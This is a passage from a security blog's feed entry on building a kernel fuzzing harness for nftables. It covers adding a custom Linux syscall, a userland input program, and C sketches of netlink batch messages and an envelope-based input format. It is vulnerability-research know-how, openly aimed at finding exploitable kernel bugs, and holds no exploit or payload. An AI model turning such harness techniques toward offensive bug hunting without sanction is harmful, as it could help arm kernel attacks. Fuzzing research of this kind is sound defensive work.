<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://h0mbre.github.io/feed.xml" rel="self" type="application/atom+xml" /><link href="https://h0mbre.github.io/" rel="alternate" type="text/html" /><updated>2025-10-15T00:10:05+00:00</updated><id>https://h0mbre.github.io/feed.xml</id><title type="html">The Human Machine Interface</title><subtitle>fuzzing + exploitation</subtitle><entry><title type="html">Lucid Dreams II: Harness Development</title><link href="https://h0mbre.github.io/Lucid_Dreams_2/" rel="alternate" type="text/html" title="Lucid Dreams II: Harness Development" /><published>2025-10-13T00:00:00+00:00</published><updated>2025-10-13T00:00:00+00:00</updated><id>https://h0mbre.github.io/Lucid_Dreams_2</id><content type="html" xml:base="https://h0mbre.github.io/Lucid_Dreams_2/"><![CDATA[<h2 id="background">Background</h2>
<p>Last episode on the blog we took a shallow and broad approach to fuzzing several Netlink-plumbed subsystems like Netfilter, Route, Crypto, and Xfrm. This endeavor wasn’t necessarily an earnest bug finding mission since we mostly wanted to just see how fuzzing a real target with Lucid would go and what things would need tweaking. We ended up changing quite a bit of the core-fuzzer features, specifically Redqueen issues, and were able to improve the fuzzer quite a bit. We modularized the mutator component of Lucid so now writing your own fuzzer for Lucid is as simple as implementing your own mutator. We can extend this even more, and will, by enabling the user to pass command line arguments directly to the bespoke mutator.</p>

<p>So now you can conceive of the main Lucid core components as a fuzzing engine and the mutator as the “fuzzer” because it is responsible for all of the target-specific characteristics. So for example, if we were to fuzz Chrome in Lucid, you would write a “Chrome fuzzer” by implementing your own fuzzing harness for Chrome and then implementing your own mutator to generate and mutate inputs.</p>

<p>We now switch to a more earnest bug finding mode of operation. I’ve decided for this series to focus on fuzzing <a href="https://en.wikipedia.org/wiki/Nftables"><code class="language-plaintext highlighter-rouge">nftables</code></a> for a few different reasons:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">nftables</code> doesn’t have as many eyeballs on it anymore, at least publicly, because kCTF has changed its rules around unprivileged user namespaces, which has severely decreased the value of exploitable bugs in surfaces that live behind those namespaces, so there is less competition</li>
  <li><code class="language-plaintext highlighter-rouge">nftables</code> is extremely complex. There are several hierarchical structures and states that can occur. In addition, the code exists on two planes: a control plane responsible for creating these nested and complex resources and a data plane responsible for interacting with those created structures. For the early going, we’re going to be focusing exclusively on the control plane with designs on implementing data plane interactions later</li>
  <li><code class="language-plaintext highlighter-rouge">nftables</code> has a history of bugs, so much so that it was explicitly disabled in kCTF’s bounty program</li>
  <li>Syzkaller fuzzes <code class="language-plaintext highlighter-rouge">nftables</code> already, but if you look at the types of messages it is able to generate, it tends to favor syntactically-valid but semantically-invalid inputs. For instance, it will send a well-formed message to create a resource, but the argument values themselves may be nonsense. Further, syzkaller currently has no way to track the state of resources if they were successfully created. So sequences like create resource -&gt; modify resource -&gt; use resource -&gt; destroy resource are not possible currently unless they happen by sheer random chance which is highly unlikely</li>
  <li>lastly, this represents a fun engineering challenge. Creating a mutator/generator that is able to achieve deep stateful coverage of <code class="language-plaintext highlighter-rouge">nftables</code> will be something unique as far as public research goes I think</li>
</ul>

<h2 id="adding-custom-syscall">Adding Custom Syscall</h2>
<p>The first thing we need is a way to interact with the <code class="language-plaintext highlighter-rouge">nftables</code> subsystem. My go-to strategy here is to create a custom syscall that takes a userland buffer pointer and a data length. This allows us to send an input from userland and have it traverse the harness and then hit the target subsystem. Now, this is not how I want to <em>fuzz</em>, but it is a useful setup for debugging, collecting coverage metrics for visualization, and also reproducing crashes. Ideally the flow looks like this:</p>
<ol>
  <li>Send data buffer via syscall</li>
  <li>Context-switch to kernel mode as harness is about to parse input</li>
  <li>[FUZZING-ONLY] Take snapshot</li>
  <li>Harness parses input and dispatches to target subsystem</li>
  <li>[FUZZING-ONLY] Reset snapshot</li>
  <li>Return to userland</li>
</ol>

<p>This setup gives us the best of both worlds: we can easily debug and play with our harness from userland, and we can also fuzz completely in kernel context without having to emulate any expensive context switches per fuzzcase.</p>

<p>To add a new syscall, we have to edit the <code class="language-plaintext highlighter-rouge">syscall_64.tbl</code> file found in <code class="language-plaintext highlighter-rouge">linux_version/arch/x86/entry/syscalls</code>, wherein I added a new syscall entry right after the last syscall entry:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="mi">466</span>	<span class="n">common</span>	<span class="n">removexattrat</span>		<span class="n">sys_removexattrat</span>
<span class="mi">467</span>	<span class="n">common</span>	<span class="n">open_tree_attr</span>		<span class="n">sys_open_tree_attr</span>
<span class="mi">468</span>	<span class="n">common</span>	<span class="n">file_getattr</span>		<span class="n">sys_file_getattr</span>
<span class="mi">469</span>	<span class="n">common</span>	<span class="n">file_setattr</span>		<span class="n">sys_file_setattr</span>
<span class="mi">470</span>	<span class="n">common</span>	<span class="n">lucid_fuzz</span>		<span class="n">sys_lucid_fuzz</span>
</code></pre></div></div>

<p>Now we have to define it in the <code class="language-plaintext highlighter-rouge">linux_version/include/linux/syscalls.h</code> file:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="n">asmlinkage</span> <span class="kt">long</span> <span class="nf">sys_geteuid16</span><span class="p">(</span><span class="kt">void</span><span class="p">);</span>
<span class="n">asmlinkage</span> <span class="kt">long</span> <span class="nf">sys_getgid16</span><span class="p">(</span><span class="kt">void</span><span class="p">);</span>
<span class="n">asmlinkage</span> <span class="kt">long</span> <span class="nf">sys_getegid16</span><span class="p">(</span><span class="kt">void</span><span class="p">);</span>
<span class="n">asmlinkage</span> <span class="kt">long</span> <span class="nf">sys_lucid_fuzz</span><span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">);</span>
</code></pre></div></div>

<p>Because we want to fuzz <code class="language-plaintext highlighter-rouge">nftables</code>, I decided to implement the syscall itself in a new file called <code class="language-plaintext highlighter-rouge">lucid_fuzz.c</code> and placed that inside <code class="language-plaintext highlighter-rouge">linux_version/net/netfilter</code> folder:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;linux/kernel.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;linux/syscalls.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;linux/uaccess.h&gt;</span><span class="cp">
</span>
<span class="n">SYSCALL_DEFINE2</span><span class="p">(</span><span class="n">lucid_fuzz</span><span class="p">,</span> <span class="k">const</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span><span class="p">,</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">printk</span><span class="p">(</span><span class="s">"Inside lucid fuzz!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Now we have to tell the kernel to compile this source file. This is accomplished by editing the folder’s <code class="language-plaintext highlighter-rouge">Makefile</code> to ensure that our <code class="language-plaintext highlighter-rouge">lucid_fuzz.c</code> file is used to create an object file. I changed the top line of the <code class="language-plaintext highlighter-rouge">Makefile</code> in my kernel version <code class="language-plaintext highlighter-rouge">6.17</code> to this:</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>netfilter-objs := core.o nf_log.o nf_queue.o nf_sockopt.o utils.o lucid_fuzz.o
</code></pre></div></div>

<p>When we build the kernel, we should see this in the output:</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  CC      net/netfilter/lucid_fuzz.o
</code></pre></div></div>

<p>To interact with the syscall, we’ll need a userland program. This is a small program to read data from standard in (easy to use in the future to reproduce crashes or replay fuzzing inputs) and then send that data via the syscall to the kernel:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// gcc harness.c -o harness -static</span>
<span class="cp">#define _GNU_SOURCE
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/syscall.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;errno.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdint.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;limits.h&gt;</span><span class="cp">
</span>
<span class="cp">#ifndef __NR_lucid_fuzz
#define __NR_lucid_fuzz 470 // Our syscall number
#endif
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Start at a page, we'll double this if we need more memory</span>
    <span class="kt">size_t</span> <span class="n">cap</span> <span class="o">=</span> <span class="mi">4096</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">len</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">const</span> <span class="kt">size_t</span> <span class="n">MAX_CAP</span> <span class="o">=</span> <span class="mi">64</span> <span class="o">*</span> <span class="mi">1024</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">;</span> <span class="c1">// Shouldn't need more than this?</span>

    <span class="c1">// Create a buffer to hold data</span>
    <span class="kt">uint8_t</span> <span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="n">cap</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">buf</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"malloc"</span><span class="p">);</span>
        <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Read until we can't</span>
    <span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// Grab data from standard in, taking into account the offset as determined</span>
        <span class="c1">// by `len`</span>
        <span class="kt">ssize_t</span> <span class="n">n</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">STDIN_FILENO</span><span class="p">,</span> <span class="n">buf</span> <span class="o">+</span> <span class="n">len</span><span class="p">,</span> <span class="n">cap</span> <span class="o">-</span> <span class="n">len</span><span class="p">);</span>

        <span class="c1">// If we got bytes...</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">n</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="c1">// Adjust offset</span>
            <span class="n">len</span> <span class="o">+=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">n</span><span class="p">;</span>

            <span class="c1">// See if we hit the current cap</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">==</span> <span class="n">cap</span><span class="p">)</span> <span class="p">{</span>

                <span class="c1">// Hit sanity check, bail</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">cap</span> <span class="o">&gt;=</span> <span class="n">MAX_CAP</span><span class="p">)</span> <span class="p">{</span>
                    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"refusing to grow beyond %zu bytes</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">MAX_CAP</span><span class="p">);</span>
                    <span class="n">free</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span>
                    <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
                <span class="p">}</span>

                <span class="c1">// Create new backing buffer</span>
                <span class="kt">size_t</span> <span class="n">ncap</span> <span class="o">=</span> <span class="n">cap</span> <span class="o">*</span> <span class="mi">2</span><span class="p">;</span>

                <span class="c1">// Lol </span>
                <span class="k">if</span> <span class="p">(</span><span class="n">ncap</span> <span class="o">&lt;=</span> <span class="n">cap</span><span class="p">)</span> <span class="p">{</span>
                    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"size overflow</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
                    <span class="n">free</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span>
                    <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
                <span class="p">}</span>

                <span class="c1">// Make sure we didn't do an oopsie</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">ncap</span> <span class="o">&gt;</span> <span class="n">MAX_CAP</span><span class="p">)</span> <span class="n">ncap</span> <span class="o">=</span> <span class="n">MAX_CAP</span><span class="p">;</span>
                <span class="kt">uint8_t</span> <span class="o">*</span><span class="n">tmp</span> <span class="o">=</span> <span class="n">realloc</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="n">ncap</span><span class="p">);</span>
                <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">tmp</span><span class="p">)</span> <span class="p">{</span>
                    <span class="n">perror</span><span class="p">(</span><span class="s">"realloc"</span><span class="p">);</span>
                    <span class="n">free</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span>
                    <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
                <span class="p">}</span>

                <span class="c1">// Update </span>
                <span class="n">buf</span> <span class="o">=</span> <span class="n">tmp</span><span class="p">;</span>
                <span class="n">cap</span> <span class="o">=</span> <span class="n">ncap</span><span class="p">;</span>
            <span class="p">}</span>
            <span class="k">continue</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="c1">// Done reading: EOF</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">n</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="k">break</span><span class="p">;</span>

        <span class="c1">// Failed to read but just because of an interrupt, try again</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">n</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">errno</span> <span class="o">==</span> <span class="n">EINTR</span><span class="p">)</span> <span class="k">continue</span><span class="p">;</span>
        
        <span class="c1">// Bail on any other errors</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">n</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">perror</span><span class="p">(</span><span class="s">"read"</span><span class="p">);</span>
            <span class="n">free</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span>
            <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="c1">// Call our custom syscall </span>
    <span class="kt">long</span> <span class="n">ret</span> <span class="o">=</span> <span class="n">syscall</span><span class="p">(</span><span class="n">__NR_lucid_fuzz</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">len</span><span class="p">);</span>

    <span class="c1">// Need to make sure that our syscall returns meaningful data on error</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">int</span> <span class="n">e</span> <span class="o">=</span> <span class="n">errno</span><span class="p">;</span>
        <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"lucid_fuzz failed: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="n">e</span><span class="p">));</span>
        <span class="n">free</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span>
        <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="n">printf</span><span class="p">(</span><span class="s">"lucid_fuzz returned %ld</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">ret</span><span class="p">);</span>
    <span class="n">free</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Now we can test in <code class="language-plaintext highlighter-rouge">qemu-system</code>:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@syzkaller:~#</span><span class="w"> </span><span class="nb">echo</span> <span class="s2">"lol"</span> | harness
<span class="go">[  256.492957] Inside lucid fuzz!
lucid_fuzz returned 0
</span><span class="gp">root@syzkaller:~#</span><span class="w"> 
</span></code></pre></div></div>

<p>So everything works with the syscall, now it’s time to make it an actual fuzzing harness.</p>

<h2 id="deciding-input-format">Deciding Input Format</h2>
<p>We want to be able to create stateful inputs for <code class="language-plaintext highlighter-rouge">nftables</code>. This obviously means we need enough runway initially in our inputs to <em>build up complex state</em>! This seems obvious and simple, but I think it’s hard to actually implement correctly. We have to consider various things like:</p>
<ul>
  <li>Not all “state” is “good state”: Just because an input can create 4096 <code class="language-plaintext highlighter-rouge">nft_table</code> data structures, doesn’t mean that that’s interesting from a vulnerability research perspective</li>
  <li>Short inputs are not likely going to create complex state: We need to have somewhat long inputs in order to build up state</li>
  <li>Extremely large inputs may be meaningless: There may not be any meaningful difference between short and long inputs when the short input is <em>long enough</em> to create “good state” and we may end up spending tons of CPU cycles doing nothing interesting and working on enormous inputs</li>
</ul>

<p>With these things in mind, let’s first take a cautious approach and make sure we can generate long inputs <em>some</em> of the time, but most of the time focus on relatively normal sized inputs.</p>

<h3 id="nftables-messages"><code class="language-plaintext highlighter-rouge">nftables</code> Messages</h3>
<p><code class="language-plaintext highlighter-rouge">nftables</code> expects Netlink messages that are formatted a certain way. It has two modes of messaging as far as I can tell: standalone messages, which are simple messages like “object getters” and batched messages, which are for object creation/modification/deletion. They have gone with a design where anything that can modify state is subject to batching and everything that is read-only can be a standalone message. In the batch mode of operation, <code class="language-plaintext highlighter-rouge">nftables</code> will have something like a “staging” phase, where it parses the messages in the batch and validates them. While it’s validating each individual batched message, it makes sure that the resources being created/manipulated are sane and actually exist and are modifiable. <code class="language-plaintext highlighter-rouge">nftables</code> will stage all the changes and then if a single message fails in the batch, will attempt to roll back all of those staged changes. If batch message parsing succeeds however, it moves into a “commit” phase and makes the changes.</p>
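
<p>To make the batch shape concrete, here is a minimal userland sketch that lays out one batch (begin marker, a single “create table” request, end marker) in a flat buffer. The constants and structures come from the kernel’s uapi headers; the helper names <code class="language-plaintext highlighter-rouge">put_msg</code> and <code class="language-plaintext highlighter-rouge">build_newtable_batch</code>, the 64-byte name limit, and the sequence numbers are made up for illustration and are not part of the harness.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Sketch only: builds BATCH_BEGIN + NFT_MSG_NEWTABLE + BATCH_END in a buffer.
#include &lt;arpa/inet.h&gt;
#include &lt;stdint.h&gt;
#include &lt;string.h&gt;
#include &lt;sys/socket.h&gt;
#include &lt;linux/netlink.h&gt;
#include &lt;linux/netfilter/nfnetlink.h&gt;
#include &lt;linux/netfilter/nf_tables.h&gt;

enum { MAX_NAME = 64 }; // Hypothetical cap on the table name, NUL included

// Write one nfnetlink message (nlmsghdr + nfgenmsg + attribute bytes) at
// buf + off and return the aligned offset where the next message starts.
static size_t put_msg(uint8_t *buf, size_t off, uint16_t type, uint16_t flags,
                      uint32_t seq, uint8_t family, uint16_t res_id,
                      const void *attrs, size_t attrs_len)
{
    struct nlmsghdr nlh = {
        .nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg) + attrs_len),
        .nlmsg_type = type,
        .nlmsg_flags = flags,
        .nlmsg_seq = seq,
    };
    struct nfgenmsg nfg = {
        .nfgen_family = family,
        .version = NFNETLINK_V0,
        .res_id = htons(res_id),
    };

    memcpy(buf + off, &amp;nlh, sizeof(nlh));
    memcpy(buf + off + NLMSG_HDRLEN, &amp;nfg, sizeof(nfg));
    if (attrs_len)
        memcpy(buf + off + NLMSG_HDRLEN + sizeof(nfg), attrs, attrs_len);
    return off + NLMSG_ALIGN(nlh.nlmsg_len);
}

// Returns the number of bytes written, or 0 if the name or buffer won't fit.
size_t build_newtable_batch(uint8_t *buf, size_t cap, const char *name)
{
    // One NFTA_TABLE_NAME attribute: nlattr header + NUL-terminated name
    uint8_t attr[NLA_HDRLEN + MAX_NAME];
    size_t name_len = strlen(name) + 1;
    if (name_len &gt; MAX_NAME)
        return 0;

    struct nlattr nla = {
        .nla_len = (uint16_t)(NLA_HDRLEN + name_len),
        .nla_type = NFTA_TABLE_NAME,
    };
    memset(attr, 0, sizeof(attr));
    memcpy(attr, &amp;nla, sizeof(nla));
    memcpy(attr + NLA_HDRLEN, name, name_len);
    size_t attr_len = NLA_ALIGN(nla.nla_len);

    // Three messages, each with an nfgenmsg, plus the padded attribute
    size_t need = 3 * NLMSG_SPACE(sizeof(struct nfgenmsg)) + attr_len;
    if (cap &lt; need)
        return 0;
    memset(buf, 0, need);

    size_t off = 0;
    // The batch markers carry the target subsystem in res_id
    off = put_msg(buf, off, NFNL_MSG_BATCH_BEGIN, NLM_F_REQUEST, 0,
                  AF_UNSPEC, NFNL_SUBSYS_NFTABLES, NULL, 0);
    // nftables message types are (subsystem &lt;&lt; 8) | message
    off = put_msg(buf, off, (NFNL_SUBSYS_NFTABLES &lt;&lt; 8) | NFT_MSG_NEWTABLE,
                  NLM_F_REQUEST | NLM_F_CREATE, 1, AF_INET, 0,
                  attr, attr_len);
    off = put_msg(buf, off, NFNL_MSG_BATCH_END, NLM_F_REQUEST, 2,
                  AF_UNSPEC, NFNL_SUBSYS_NFTABLES, NULL, 0);
    return off;
}
</code></pre></div></div>

<p>Everything between the begin and end markers is staged together, so a mutator that wants state to survive has to keep every message inside the markers valid. A read-only “getter” would be sent as a single message without the markers.</p>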

<p>So basically, our input generator will need to be capable of sending batches of <code class="language-plaintext highlighter-rouge">nftables</code> requests with some simple read-only requests sprinkled in rarely. I decided to follow a high level input shape that is very similar to our last blogpost for this purpose. We will do the following:</p>
<ol>
  <li>Have Lucid inject a buffer of bytes at a location in Bochs’ memory. This is standard and how you want to separate duties between Lucid the fuzzing engine and Lucid’s mutators/generators. Let Lucid the fuzzing engine inject a byte blob, let the harness/mutator/generator make sense of the blob.</li>
  <li>We will pre-allocate socket buffer structures <code class="language-plaintext highlighter-rouge">skb(s)</code> in the kernel so that we don’t do any large allocations in the fuzzing loop</li>
  <li>The harness will parse the byte blob, and package each input series from the mutator in an <code class="language-plaintext highlighter-rouge">skb</code> and ship the <code class="language-plaintext highlighter-rouge">skb</code> off to <code class="language-plaintext highlighter-rouge">nftables</code> for parsing</li>
  <li>We will separate series of <code class="language-plaintext highlighter-rouge">nftables</code> messages into what we’ll call “envelopes”. Last blogpost we called them “messages” but because Netlink also operates on “messages” this nomenclature is confusing.</li>
</ol>

<p>Our input then will contain two different data structures as the harness sees things:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// An input structure</span>
<span class="k">struct</span> <span class="n">lf_input</span> <span class="p">{</span>
	<span class="n">u32</span> <span class="n">total_len</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">num_envs</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">data</span><span class="p">[];</span>
<span class="p">};</span>

<span class="c1">// An envelope structure</span>
<span class="k">struct</span> <span class="n">lf_envelope</span> <span class="p">{</span>
	<span class="n">u32</span> <span class="n">len</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">data</span><span class="p">[];</span>
<span class="p">};</span>
</code></pre></div></div>

<p>This is very similar to our <a href="https://h0mbre.github.io/Lucid_Dreams_1/">last blogpost</a>, but with some key changes to the <code class="language-plaintext highlighter-rouge">envelope</code> structure. So in practice, an input will always have a single <code class="language-plaintext highlighter-rouge">struct lf_input</code> structure at its beginning describing the input in its entirety, and then, up to the max number of envelopes, a series of <code class="language-plaintext highlighter-rouge">struct lf_envelope</code> structures containing the actual Netlink messages for <code class="language-plaintext highlighter-rouge">nftables</code> in their <code class="language-plaintext highlighter-rouge">data</code> members. So an input may look like:</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[
	[lf_input: total_len=4096, num_envs=2]
		[lf_envelope: len=2048, &lt;data&gt;]
		[lf_envelope: len=2048, &lt;data&gt;]
]
</code></pre></div></div>

<p>Remember: the core Lucid components know nothing about this structure, Lucid is only responsible for injecting the input and its length into the target at a location in memory. It’s up to the mutator and the harness to make sense of the structure.</p>
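
<p>As a rough illustration of that layout, here is a userland sketch that serializes a set of payloads into one input blob. The structures mirror the ones above with fixed-width userland types; the function name <code class="language-plaintext highlighter-rouge">lf_build</code> is hypothetical, and I’m assuming <code class="language-plaintext highlighter-rouge">total_len</code> is the sum of the envelope payload lengths because that matches the example layout. The real harness may count it differently.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Sketch only: pack payloads into [lf_input][lf_envelope + data]...
#include &lt;stdint.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;

// Userland mirrors of the harness structures (u32 -&gt; uint32_t, u8 -&gt; uint8_t)
struct lf_input {
    uint32_t total_len;
    uint32_t num_envs;
    uint8_t data[];
};

struct lf_envelope {
    uint32_t len;
    uint8_t data[];
};

// Returns a malloc'd blob (caller frees) and stores its size in *out_len.
// ASSUMPTION: total_len = sum of envelope payload lengths.
uint8_t *lf_build(const uint8_t *const *payloads, const uint32_t *lens,
                  uint32_t num_envs, size_t *out_len)
{
    // First pass: work out how big the blob needs to be
    size_t size = sizeof(struct lf_input);
    uint32_t total = 0;
    for (uint32_t i = 0; i &lt; num_envs; i++) {
        size += sizeof(struct lf_envelope) + lens[i];
        total += lens[i];
    }

    uint8_t *blob = malloc(size);
    if (!blob)
        return NULL;

    // Input header
    size_t off = 0;
    memcpy(blob + off, &amp;total, sizeof(total));
    off += sizeof(total);
    memcpy(blob + off, &amp;num_envs, sizeof(num_envs));
    off += sizeof(num_envs);

    // Second pass: each envelope is a length followed by its payload
    for (uint32_t i = 0; i &lt; num_envs; i++) {
        memcpy(blob + off, &amp;lens[i], sizeof(lens[i]));
        off += sizeof(lens[i]);
        memcpy(blob + off, payloads[i], lens[i]);
        off += lens[i];
    }

    *out_len = off;
    return blob;
}
</code></pre></div></div>

<p>A blob built this way could be written to standard out and piped into the userland test program from earlier, which is handy for hand-crafting inputs while debugging the harness.</p>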

<p>So now let’s implement the harness with this in mind. It will need to receive the bytes, parse them, wrap each envelope’s data in an <code class="language-plaintext highlighter-rouge">skb</code> and send the <code class="language-plaintext highlighter-rouge">skb</code> to <code class="language-plaintext highlighter-rouge">nftables</code>.</p>

<h2 id="reaching-nftables">Reaching <code class="language-plaintext highlighter-rouge">nftables</code></h2>
<p>The normal path user input takes to <code class="language-plaintext highlighter-rouge">nftables</code> is something like:</p>
<ol>
  <li>userland process creates an <code class="language-plaintext highlighter-rouge">NETLINK_NETFILTER</code> Netlink socket</li>
  <li>userland process sends request via <code class="language-plaintext highlighter-rouge">sendmsg</code> syscall or similar (maybe <code class="language-plaintext highlighter-rouge">sendto</code>) via the Netlink socket</li>
  <li>those bytes get wrapped in an <code class="language-plaintext highlighter-rouge">skb</code> in <code class="language-plaintext highlighter-rouge">netlink_sendmsg</code></li>
  <li>based on the socket’s protocol type, <code class="language-plaintext highlighter-rouge">netlink_sendmsg</code> finds Netfilter’s registered kernel socket, which was initialized at kernel boot. That socket has a callback attached to it called <code class="language-plaintext highlighter-rouge">.input</code> that is invoked when there is data ready for it</li>
  <li>The callback, which points to <code class="language-plaintext highlighter-rouge">nfnetlink_rcv</code>, is invoked and receives the <code class="language-plaintext highlighter-rouge">skb</code> holding our data from userland</li>
</ol>

<p>We can do similar things, but make it more direct since we know the destination in our harness is <code class="language-plaintext highlighter-rouge">nftables</code>. We can:</p>
<ol>
  <li>Pre-allocate <code class="language-plaintext highlighter-rouge">skb</code> structures to hold our envelopes</li>
  <li>Parse the <code class="language-plaintext highlighter-rouge">lf_input</code>, and for each included <code class="language-plaintext highlighter-rouge">lf_envelope</code>:</li>
  <li>Stuff the envelope’s data into an <code class="language-plaintext highlighter-rouge">skb</code></li>
  <li>Send the <code class="language-plaintext highlighter-rouge">skb</code> directly to <code class="language-plaintext highlighter-rouge">nfnetlink_rcv</code></li>
  <li>Repeat from step 3 for each remaining envelope</li>
</ol>
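
<p>The parse-and-dispatch part of those steps can be prototyped in userland before touching the kernel. This is only a sketch: <code class="language-plaintext highlighter-rouge">lf_walk</code> and <code class="language-plaintext highlighter-rouge">count_bytes</code> are hypothetical names, the limits are passed in as parameters, and the callback stands in for “copy into an <code class="language-plaintext highlighter-rouge">skb</code> and call <code class="language-plaintext highlighter-rouge">nfnetlink_rcv</code>”. The in-kernel version will look different.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Sketch only: walk an input blob and hand each envelope to a callback.
#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;
#include &lt;string.h&gt;

// Stand-in for the skb + nfnetlink_rcv delivery step
typedef void (*lf_deliver_fn)(const uint8_t *data, uint32_t len, void *ctx);

// Example callback: just tally how many payload bytes were delivered
void count_bytes(const uint8_t *data, uint32_t len, void *ctx)
{
    (void)data;
    *(size_t *)ctx += len;
}

// Returns the number of envelopes delivered, or -1 on a malformed blob.
// Envelopes are delivered as they are validated, so earlier envelopes may
// already have been dispatched when a later one turns out to be bad.
int lf_walk(const uint8_t *blob, size_t blob_len, uint32_t max_envs,
            uint32_t max_env_len, lf_deliver_fn deliver, void *ctx)
{
    uint32_t total_len, num_envs;
    const size_t hdr_len = sizeof(total_len) + sizeof(num_envs);

    // Need at least the lf_input header
    if (blob_len &lt; hdr_len)
        return -1;
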